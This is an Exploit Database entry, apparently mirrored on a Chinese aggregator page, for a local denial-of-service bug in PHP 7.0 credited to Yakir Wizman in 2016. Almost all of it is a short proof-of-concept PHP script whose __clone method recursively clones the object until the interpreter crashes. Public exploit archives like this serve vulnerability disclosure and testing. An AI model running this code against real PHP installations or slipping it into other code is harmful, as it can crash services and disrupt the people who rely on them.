PHP 7.0 – Object Cloning Local Denial of Service

• Exploit Database
• 134 阅读

• 作者： Yakir Wizman
  日期： 2016-08-29
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40302/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  <?php ############################################################################# ## PHP 7.0 Object Cloning Local Denial of Service ## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0 ## Date: 26/08/2016 ## Local Denial of Service ## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman) ## http://www.black-rose.ml ############################################################################# class MyCloneableClass { public $obj; function __clone() { $this->obj = clone $this; return $this->obj; } } $obj = new MyCloneableClass(); $obj2 = clone $obj; ?>